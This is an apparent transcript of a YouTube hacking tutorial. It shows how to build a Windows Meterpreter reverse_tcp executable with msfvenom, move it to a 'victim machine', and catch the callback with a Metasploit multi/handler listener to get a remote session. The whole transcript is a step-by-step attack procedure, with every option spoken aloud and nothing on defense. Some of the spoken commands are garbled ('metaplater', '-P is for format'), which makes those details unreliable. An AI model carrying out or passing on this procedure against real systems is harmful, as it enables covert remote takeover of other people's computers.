What's up guys, welcome back to my channel Hidden Q. Today's video I am going to demonstrate how to make a payload for Windows, and I also demonstrate how to compromise Windows machine by using this payload in this video. So let's start the video. In this video I am creating a stage payload for Windows. To create a Windows payload we are using the MSFvenom. What is MSFvenom? MSFvenom is a standard payload generator. By MSFvenom we can generate or we can create any kind of payload like Windows payload, Linux payload, Mac payload or Android payload, whatever. To creating a payload we have to use this command MSFvenom. Okay, this is the help option of MSFvenom. MSFvenom is a Metasploit standalone payload generator. Okay, options. Talking about options, -L is listing all the modules. -P used for the payload, and -P is for format. -E for encoder. Okay, you can check manually one by one. Okay, let me clear the terminal and creating a Windows payload. So command will be MSFvenom -P used for payload. We are creating a Windows payload. Windows we are creating for 64-bit architecture. Okay, you can create 64 or 32-bit. Okay, I am using 64-bit MS x64. The another option we have to give the shell. We can use a generic shell or normal shell or metaplater shell. The advantage of metaplater shell is a very advanced shell provided by MSFvenom for connection, and you can use any kind of connection. Let's suppose TCP, UDP, whatever. In this video I am using the reverse TCP connection. Okay, reverse underscore TCP. Okay, after that we have to set the L host and L port. What is the L host? L host means local host and the local port. Okay, and give the L port. You can give any port. By default I am using the L port 4444. Okay, then we have to mention the architecture. In this video I am using x64-bit, that means 64-bit architecture. So we have to use the architecture -A use for architecture. We are using x64, and we have to give the file type. What type of payload we are creating? Either exe file or apk file or whatever. -F is used for file type. We are creating Windows support.exe. That means we have to give exe. We are almost done. Let's save the output. -O is for output. You can give any name. I am giving the name hack.exe. Okay, then enter. It is taking little bit time to generate the payload. Here you can see the payload. The payload size is 520 bytes and the final size is, the actual payload size is 7168 byte. You can see the payload here, hack.exe. After creating a payload we have to transfer this payload to a victim machine. Okay, you can use any method to transfer this payload. You can use simply FTP or SMB. For time saving I just copy and paste it here. Okay, the transferring is complete. Then after transferring this payload we have to set the listener for accepting the reverse connection, because we are using the reverse TCP connection. To set the listener I am using MSF console. Okay, then we have to set the exploit. Okay, first I am using use exploit multi handler. Okay, so options. Here you can see The payload options is generic shell reverse TCP. In that case, we have to set our own payload which was created. Command will be set payload TCP. Then options, yeah, you can see here. Then we have to set the L port, sorry, L host 192.168. Set the L port and set the L port 4444. By default it is set, but we are almost done. Okay, simply you can exploit. Okay, here you can see started reverse TCP handler. Okay, that means this is waiting for a reverse connection. Simply you can go and execute this exe. Yeah, you can see here we got the system sending stage. Beta session one is open. Okay, let me check the UID. Get UID. Yeah, username is display here and listing the directory ls. You can see here all the directory. Okay, that's all for this video. In the next video I'll show how to gain the access from normal user to administrative user. That means privilege escalation. Okay, Windows privilege escalation. Next video I'll demonstrate it. Hope you like my video. If you like my video, you can subscribe my channel for further video. Thank you so much.